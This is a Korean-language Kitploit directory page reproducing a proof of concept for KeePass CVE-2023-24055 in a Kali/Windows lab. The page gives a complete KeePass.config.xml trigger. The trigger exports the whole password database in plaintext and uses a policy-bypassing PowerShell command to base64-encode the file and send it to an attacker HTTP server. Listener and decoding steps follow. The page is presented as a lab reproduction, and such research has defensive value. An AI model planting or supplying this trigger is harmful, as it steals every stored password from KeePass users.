Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
KeePass-CVE-2023-24055 — KeePass CVE-2023-24055 재현 | Kitploit
도구/GitHubGitHub/zwlsix/keepass-cve-2023-24055
Password AttacksVulnerability AnalysisExploitationData ExfiltrationLearning & EducationLabs & Practice
GitHubzwlsix/keepass-cve-2023-24055

KeePass-CVE-2023-24055

KeePass CVE-2023-24055 재현

저장소 보기
123년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

KeePass-CVE-2023-24055

KeePass CVE-2023-24055 재현 KeePass CVE-2023-24055 재현

1, 준비 머신: kali(192.168.232.129), windows10(192.168.232.128)

2, keepass 버전: 2.53

그림1

2, 원리: keepass 구성 파일 KeePass.config.xml을 수정하고 트리거 구성 항목을 추가합니다: 평문 비밀번호를 내보내고 공격자 서버에 업로드합니다. 트리거를 추가하기 위한 xml 코드는 다음과 같습니다:

여기서: <Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter> 필드는 평문 비밀번호를 내보낼 로컬 경로를 설정합니다

powershell을 사용하여 GET 메서드로 비밀번호 파일을 전송합니다

root@kitploit:~
<Parameter>PowerShell.exe</Parameter>
<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
root@kitploit:~
<Triggers>
				<Trigger>
					<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
					<Name>exploit</Name>
					<Events>
						<Event>
							<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
							<Parameters>
								<Parameter>0</Parameter>
								<Parameter />
							</Parameters>
						</Event>
					</Events>
					<Conditions />
					<Actions>
						<Action>
							<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
							<Parameters>
								<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>
								<Parameter>KeePass XML (2.x)</Parameter>
								<Parameter />
								<Parameter />
							</Parameters>
						</Action>
						<Action>
							<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
							<Parameters>
								<Parameter>PowerShell.exe</Parameter>
								<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
								<Parameter>False</Parameter>
								<Parameter>1</Parameter>
								<Parameter />
							</Parameters>
						</Action>
					</Actions>
				</Trigger>
			</Triggers>

3, KeePass.config.xml 파일을 수정하고 xml 구성 항목을 추가한 후 저장합니다(추가 위치: <TriggerSystem></TriggerSystem> 태그 내부). keepass를 열어 추가가 성공했는지 확인합니다:

tu2

4, kali를 열고 python3 -m http.server 8888 명령으로 웹 서비스를 시작하여 내보낸 비밀번호 평문을 수신합니다

tu3

5, keepass를 열고 새 레코드를 생성하여 저장하면 트리거가 실행됩니다. kali에서 수신한 내용을 확인합니다:

tu4

6, 내용을 파일에 복사하고 base64로 디코딩하면 평문 비밀번호를 얻을 수 있습니다

tu5

tu6

참고 문서: https://github.com/alt3kx/CVE-2023-24055_PoC

https://www.youtube.com/watch?v=tqK1bns51ek

도구 다운로드